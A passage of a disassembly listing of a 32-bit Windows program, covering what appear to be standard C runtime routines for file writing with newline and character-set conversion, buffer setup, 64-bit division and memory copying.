jz short loc_40CEF8
cmp cl, 1
jnz short loc_40CF2B
loc_40CEF8: ; CODE XREF: sub_40CE5A+97�j
mov ecx, [ebp+518h+arg_8]
not ecx
test cl, 1
jnz short loc_40CF2B
call sub_4057E6
xor esi, esi
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_40D400
; ---------------------------------------------------------------------------
loc_40CF2B: ; CODE XREF: sub_40CE5A+9C�j
; sub_40CE5A+A9�j
test byte ptr [eax+4], 20h
jz short loc_40CF40
push 2
push 0
push 0
push esi
call sub_40CCBE
add esp, 10h
loc_40CF40: ; CODE XREF: sub_40CE5A+D5�j
push esi
call sub_40D540
test eax, eax
pop ecx
jz loc_40D145
mov eax, [edi]
test byte ptr [ebx+eax+4], 80h
jz loc_40D145
call sub_40539D
mov eax, [eax+6Ch]
xor ecx, ecx
cmp [eax+14h], ecx
lea eax, [ebp+518h+var_594]
setz cl
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
mov esi, ecx
call ds:dword_41D118
test eax, eax
jz loc_40D145
test esi, esi
jz short loc_40CF93
cmp [ebp+518h+var_56D], 0
jz loc_40D145
loc_40CF93: ; CODE XREF: sub_40CE5A+12D�j
call ds:dword_41D11C
and [ebp+518h+var_568], 0
cmp [ebp+518h+arg_8], 0
mov esi, [ebp+518h+var_57C]
mov [ebp+518h+var_594], eax
mov [ebp+518h+var_58C], esi
jbe loc_40D3B2
and [ebp+518h+var_574], 0
jmp short loc_40CFBC
; ---------------------------------------------------------------------------
loc_40CFB9: ; CODE XREF: sub_40CE5A+2E0�j
mov esi, [ebp+518h+var_58C]
loc_40CFBC: ; CODE XREF: sub_40CE5A+15D�j
mov al, [ebp+518h+var_56D]
test al, al
jnz loc_40D0CD
mov al, [esi]
xor ecx, ecx
cmp al, 0Ah
setz cl
movsx eax, al
push eax
mov [ebp+518h+var_590], ecx
call sub_40CA36
test eax, eax
pop ecx
jnz short loc_40CFFB
push 1
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
jmp short loc_40D02B
; ---------------------------------------------------------------------------
loc_40CFFB: ; CODE XREF: sub_40CE5A+185�j
mov eax, [ebp+518h+var_57C]
sub eax, esi
add eax, [ebp+518h+arg_8]
cmp eax, 1
jbe loc_40D3A8
push 2
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
inc esi
inc [ebp+518h+var_574]
loc_40D02B: ; CODE XREF: sub_40CE5A+19F�j
xor eax, eax
push eax
push eax
push 5
lea ecx, [ebp+518h+var_C]
push ecx
push 1
lea ecx, [ebp+518h+var_56C]
push ecx
push eax
push [ebp+518h+var_594]
inc esi
inc [ebp+518h+var_574]
mov [ebp+518h+var_58C], esi
call ds:dword_41D138
mov esi, eax
test esi, esi
jz loc_40D3A8
push 0
lea eax, [ebp+518h+var_568]
push eax
push esi
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_568]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
cmp [ebp+518h+var_590], 0
jz loc_40D131
push 0
lea eax, [ebp+518h+var_568]
push eax
push 1
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
mov [ebp+518h+var_C], 0Dh
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
cmp [ebp+518h+var_568], 1
jl loc_40D3A8
inc [ebp+518h+var_580]
inc [ebp+518h+var_578]
jmp short loc_40D131
; ---------------------------------------------------------------------------
loc_40D0CD: ; CODE XREF: sub_40CE5A+167�j
cmp al, 1
jz short loc_40D0D5
cmp al, 2
jnz short loc_40D0F0
loc_40D0D5: ; CODE XREF: sub_40CE5A+275�j
movzx ecx, word ptr [esi]
xor edx, edx
cmp cx, 0Ah
setz dl
inc esi
inc esi
add [ebp+518h+var_574], 2
mov [ebp+518h+var_56C], ecx
mov [ebp+518h+var_58C], esi
mov [ebp+518h+var_590], edx
loc_40D0F0: ; CODE XREF: sub_40CE5A+279�j
cmp al, 1
jz short loc_40D0F8
cmp al, 2
jnz short loc_40D131
loc_40D0F8: ; CODE XREF: sub_40CE5A+298�j
push [ebp+518h+var_56C]
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
cmp [ebp+518h+var_590], 0
jz short loc_40D131
push 0Dh
pop eax
push eax
mov [ebp+518h+var_56C], eax
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
inc [ebp+518h+var_580]
loc_40D131: ; CODE XREF: sub_40CE5A+232�j
; sub_40CE5A+271�j ...
mov eax, [ebp+518h+arg_8]
cmp [ebp+518h+var_574], eax
jb loc_40CFB9
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D145: ; CODE XREF: sub_40CE5A+EF�j
; sub_40CE5A+FC�j ...
mov eax, [edi]
add eax, ebx
test byte ptr [eax+4], 80h
jz loc_40D378
mov eax, [ebp+518h+var_57C]
xor esi, esi
cmp [ebp+518h+var_56D], 0
mov [ebp+518h+var_56C], esi
jnz loc_40D1F6
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D174: ; CODE XREF: sub_40CE5A+395�j
mov ecx, [ebp+518h+var_568]
and [ebp+518h+var_574], 0
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D181: ; CODE XREF: sub_40CE5A+354�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D1B0
mov edx, [ebp+518h+var_568]
inc [ebp+518h+var_568]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_40D1A1
inc [ebp+518h+var_580]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+518h+var_574]
loc_40D1A1: ; CODE XREF: sub_40CE5A+33B�j
mov [eax], dl
inc eax
inc [ebp+518h+var_574]
cmp [ebp+518h+var_574], 400h
jb short loc_40D181
loc_40D1B0: ; CODE XREF: sub_40CE5A+32D�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb short loc_40D174
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D1F6: ; CODE XREF: sub_40CE5A+305�j
cmp [ebp+518h+var_56D], 2
jnz loc_40D29D
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D20F: ; CODE XREF: sub_40CE5A+438�j
mov ecx, [ebp+518h+var_568]
xor esi, esi
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D21A: ; CODE XREF: sub_40CE5A+3F7�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D253
mov edx, [ebp+518h+var_568]
add [ebp+518h+var_568], 2
movzx edx, word ptr [edx]
inc ecx
inc ecx
cmp dx, 0Ah
jnz short loc_40D241
add [ebp+518h+var_580], 2
mov word ptr [eax], 0Dh
inc eax
inc eax
inc esi
inc esi
loc_40D241: ; CODE XREF: sub_40CE5A+3D8�j
mov edi, [ebp+518h+var_588]
mov [eax], dx
inc eax
inc eax
inc esi
inc esi
cmp esi, 3FFh
jb short loc_40D21A
loc_40D253: ; CODE XREF: sub_40CE5A+3C6�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb loc_40D20F
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D29D: ; CODE XREF: sub_40CE5A+3A0�j
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_574], eax
jbe loc_40D3D9
loc_40D2AC: ; CODE XREF: sub_40CE5A+516�j
mov ecx, [ebp+518h+var_574]
and [ebp+518h+var_568], 0
sub ecx, [ebp+518h+var_57C]
push 2
lea eax, [ebp+518h+var_160]
pop esi
loc_40D2BF: ; CODE XREF: sub_40CE5A+497�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D2F3
mov edx, [ebp+518h+var_574]
movzx edx, word ptr [edx]
add [ebp+518h+var_574], esi
add ecx, esi
cmp dx, 0Ah
jnz short loc_40D2E2
mov word ptr [eax], 0Dh
add eax, esi
add [ebp+518h+var_568], esi
loc_40D2E2: ; CODE XREF: sub_40CE5A+47C�j
add [ebp+518h+var_568], esi
mov [eax], dx
add eax, esi
cmp [ebp+518h+var_568], 152h
jb short loc_40D2BF
loc_40D2F3: ; CODE XREF: sub_40CE5A+46B�j
xor esi, esi
push esi
push esi
push 2ABh
lea ecx, [ebp+518h+var_410]
push ecx
lea ecx, [ebp+518h+var_160]
sub eax, ecx
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, ecx
push eax
push esi
push 0FDE9h
call ds:dword_41D138
mov edi, eax
cmp edi, esi
jz short loc_40D39F
loc_40D326: ; CODE XREF: sub_40CE5A+4F6�j
push 0
lea eax, [ebp+518h+var_584]
push eax
mov eax, edi
sub eax, esi
push eax
lea eax, [ebp+esi+518h+var_410]
push eax
mov eax, [ebp+518h+var_588]
mov eax, [eax]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz short loc_40D354
add esi, [ebp+518h+var_584]
cmp edi, esi
jg short loc_40D326
jmp short loc_40D35D
; ---------------------------------------------------------------------------
loc_40D354: ; CODE XREF: sub_40CE5A+4EF�j
call ds:dword_41D0F0
mov [ebp+518h+var_56C], eax
loc_40D35D: ; CODE XREF: sub_40CE5A+4F8�j
cmp edi, esi
jg short loc_40D3A8
mov eax, [ebp+518h+var_574]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
mov [ebp+518h+var_578], eax
jb loc_40D2AC
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D378: ; CODE XREF: sub_40CE5A+2F3�j
push 0
lea ecx, [ebp+518h+var_584]
push ecx
push [ebp+518h+arg_8]
push [ebp+518h+var_57C]
push dword ptr [eax]
call ds:dword_41D088
test eax, eax
jz short loc_40D39F
mov eax, [ebp+518h+var_584]
and [ebp+518h+var_56C], 0
mov [ebp+518h+var_578], eax
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D39F: ; CODE XREF: sub_40CE5A+21A�j
; sub_40CE5A+25B�j ...
call ds:dword_41D0F0
mov [ebp+518h+var_56C], eax
loc_40D3A8: ; CODE XREF: sub_40CE5A+199�j
; sub_40CE5A+1AF�j ...
mov eax, [ebp+518h+var_578]
test eax, eax
jnz short loc_40D405
mov edi, [ebp+518h+var_588]
loc_40D3B2: ; CODE XREF: sub_40CE5A+153�j
xor esi, esi
cmp [ebp+518h+var_56C], esi
jz short loc_40D3D9
push 5
pop esi
cmp [ebp+518h+var_56C], esi
jnz short loc_40D3CE
call sub_4057D3
mov dword ptr [eax], 9
jmp short loc_40D3F9
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40CE5A+565�j
push [ebp+518h+var_56C]
call sub_4057F9
pop ecx
jmp short loc_40D400
; ---------------------------------------------------------------------------
loc_40D3D9: ; CODE XREF: sub_40CE5A+314�j
; sub_40CE5A+3AF�j ...
mov eax, [edi]
test byte ptr [ebx+eax+4], 40h
jz short loc_40D3EE
mov eax, [ebp+518h+var_57C]
cmp byte ptr [eax], 1Ah
jnz short loc_40D3EE
xor eax, eax
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40CE5A+586�j
; sub_40CE5A+58E�j
call sub_4057D3
mov dword ptr [eax], 1Ch
loc_40D3F9: ; CODE XREF: sub_40CE5A+572�j
call sub_4057E6
mov [eax], esi
loc_40D400: ; CODE XREF: sub_40CE5A+CC�j
; sub_40CE5A+57D�j
or eax, 0FFFFFFFFh
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D405: ; CODE XREF: sub_40CE5A+553�j
sub eax, [ebp+518h+var_580]
loc_40D408: ; CODE XREF: sub_40CE5A+592�j
; sub_40CE5A+5A9�j
pop edi
pop ebx
loc_40D40A: ; CODE XREF: sub_40CE5A+37�j
; sub_40CE5A+62�j
mov ecx, [ebp+518h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 518h
leave
retn
sub_40CE5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4067D6+CB�p
; sub_4067D6+13A�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4217C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D44F
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40D447: ; CODE XREF: sub_40D420+5C�j
or eax, 0FFFFFFFFh
jmp loc_40D4EC
; ---------------------------------------------------------------------------
loc_40D44F: ; CODE XREF: sub_40D420+12�j
xor edi, edi
cmp eax, edi
jl short loc_40D45D
cmp eax, ds:dword_433C84
jb short loc_40D47E
loc_40D45D: ; CODE XREF: sub_40D420+33�j
; sub_40D420+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40D447
; ---------------------------------------------------------------------------
loc_40D47E: ; CODE XREF: sub_40D420+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40D45D
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D4C7
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D4C7: ; CODE XREF: sub_40D420+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40D4DD: ; CODE XREF: sub_40D420+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D4F2
mov eax, [ebp+var_1C]
loc_40D4EC: ; CODE XREF: sub_40D420+2A�j
call __SEH_epilog4
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
sub_40D4F2 proc near ; CODE XREF: sub_40D420+C4�p
; DATA XREF: seg001:004217D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40D4F2 endp
; =============== S U B R O U T I N E =======================================
sub_40D4FC proc near ; CODE XREF: sub_4067D6+9C�p
; sub_409C8D+58�p ...
arg_0 = dword ptr 4
inc ds:dword_425FC8
push 1000h
call sub_40773A
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_40D525
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_40D536
; ---------------------------------------------------------------------------
loc_40D525: ; CODE XREF: sub_40D4FC+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_40D536: ; CODE XREF: sub_40D4FC+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_40D4FC endp
; =============== S U B R O U T I N E =======================================
sub_40D540 proc near ; CODE XREF: sub_4067D6+91�p
; sub_40871B+C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D557
call sub_4057D3
mov dword ptr [eax], 9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40D557: ; CODE XREF: sub_40D540+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40D566
cmp eax, ds:dword_433C84
jb short loc_40D582
loc_40D566: ; CODE XREF: sub_40D540+1C�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40D582: ; CODE XREF: sub_40D540+24�j
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
movzx eax, byte ptr [ecx+eax+4]
and eax, 40h
pop esi
retn
sub_40D540 endp
; =============== S U B R O U T I N E =======================================
sub_40D59E proc near ; CODE XREF: sub_407979:loc_40799C�p
push esi
push edi
xor edi, edi
loc_40D5A2: ; CODE XREF: sub_40D59E+1A�j
lea esi, off_423F80[edi]
push dword ptr [esi]
call sub_405127
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_40D5A2
pop edi
pop esi
retn
sub_40D59E endp
; =============== S U B R O U T I N E =======================================
sub_40D5BD proc near ; CODE XREF: sub_4069D7+554�p
mov eax, ds:dword_423064
or eax, 1
xor ecx, ecx
cmp ds:dword_426420, eax
setz cl
mov eax, ecx
retn
sub_40D5BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5D3 proc near ; CODE XREF: sub_40D732+12�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ebp+arg_8]
jnz short loc_40D5F9
cmp edi, ebx
jbe short loc_40D5F9
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D5F5
mov [eax], ebx
loc_40D5F5: ; CODE XREF: sub_40D5D3+1E�j
; sub_40D5D3+EC�j ...
xor eax, eax
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D5F9: ; CODE XREF: sub_40D5D3+13�j
; sub_40D5D3+17�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D603
or dword ptr [eax], 0FFFFFFFFh
loc_40D603: ; CODE XREF: sub_40D5D3+2B�j
cmp edi, 7FFFFFFFh
jbe short loc_40D626
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
loc_40D622: ; CODE XREF: sub_40D5D3+CC�j
; sub_40D5D3+D5�j
mov eax, esi
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D626: ; CODE XREF: sub_40D5D3+36�j
push [ebp+arg_10]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz loc_40D6D1
mov ax, [ebp+arg_C]
cmp ax, 0FFh
jbe short loc_40D67D
cmp esi, ebx
jz short loc_40D65A
cmp edi, ebx
jbe short loc_40D65A
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
loc_40D65A: ; CODE XREF: sub_40D5D3+76�j
; sub_40D5D3+7A�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
call sub_4057D3
cmp [ebp+var_4], bl
mov eax, [eax]
jz short loc_40D678
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40D678: ; CODE XREF: sub_40D5D3+24�j
; sub_40D5D3+51�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D67D: ; CODE XREF: sub_40D5D3+72�j
cmp esi, ebx
jz short loc_40D6AF
cmp edi, ebx
ja short loc_40D6AD
loc_40D685: ; CODE XREF: sub_40D5D3+141�j
; sub_40D5D3+149�j ...
call sub_4057D3
push 22h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40D622
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D622
; ---------------------------------------------------------------------------
loc_40D6AD: ; CODE XREF: sub_40D5D3+B0�j
mov [esi], al
loc_40D6AF: ; CODE XREF: sub_40D5D3+AC�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D6BC
mov dword ptr [eax], 1
loc_40D6BC: ; CODE XREF: sub_40D5D3+E1�j
; sub_40D5D3+12A�j ...
cmp [ebp+var_4], bl
jz loc_40D5F5
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D5F5
; ---------------------------------------------------------------------------
loc_40D6D1: ; CODE XREF: sub_40D5D3+64�j
lea ecx, [ebp+arg_4]
push ecx
push ebx
push edi
push esi
push 1
lea ecx, [ebp+arg_C]
push ecx
push ebx
mov [ebp+arg_4], ebx
push dword ptr [eax+4]
call ds:dword_41D138
cmp eax, ebx
jz short loc_40D703
cmp [ebp+arg_4], ebx
jnz loc_40D65A
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_40D6BC
mov [ecx], eax
jmp short loc_40D6BC
; ---------------------------------------------------------------------------
loc_40D703: ; CODE XREF: sub_40D5D3+11A�j
call ds:dword_41D0F0
cmp eax, 7Ah
jnz loc_40D65A
cmp esi, ebx
jz loc_40D685
cmp edi, ebx
jbe loc_40D685
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
jmp loc_40D685
sub_40D5D3 endp
; =============== S U B R O U T I N E =======================================
sub_40D732 proc near ; CODE XREF: sub_4069D7+487�p
; sub_4069D7+8B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push 0
push [esp+4+arg_C]
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D5D3
add esp, 14h
retn
sub_40D732 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D750 proc near ; CODE XREF: sub_4069D7+786�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40D781
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40D7C8
; ---------------------------------------------------------------------------
loc_40D781: ; CODE XREF: sub_40D750+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40D78F: ; CODE XREF: sub_40D750+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40D78F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40D7BD
cmp edx, [esp+4+arg_4]
ja short loc_40D7BD
jb short loc_40D7C6
cmp eax, [esp+4+arg_0]
jbe short loc_40D7C6
loc_40D7BD: ; CODE XREF: sub_40D750+5D�j
; sub_40D750+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40D7C6: ; CODE XREF: sub_40D750+65�j
; sub_40D750+6B�j
xor ebx, ebx
loc_40D7C8: ; CODE XREF: sub_40D750+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40D750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40D86C+4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_40D805
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_40D805: ; CODE XREF: sub_40D7E5+18�j
; sub_40D7E5+7B�j
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_40D805
mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D86C proc near ; CODE XREF: sub_407370+42�j
; sub_407BF0+42�j ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_40D8EF
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_40D8C7
sub esi, ecx
push esi
push ebx
push eax
call sub_40D7E5
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_40D8C7: ; CODE XREF: sub_40D86C+46�j
test ecx, ecx
jz short loc_40D942
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D8EF: ; CODE XREF: sub_40D86C+37�j
cmp ecx, edi
jnz short loc_40D928
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_40D86C
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D928: ; CODE XREF: sub_40D86C+85�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_40D942: ; CODE XREF: sub_40D86C+5D�j
; sub_40D86C+81�j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40D86C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D94F proc near ; CODE XREF: sub_40777A+E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040DA54 SIZE 00000019 BYTES
push 0Ch
push offset dword_4217E0
call __SEH_prolog4
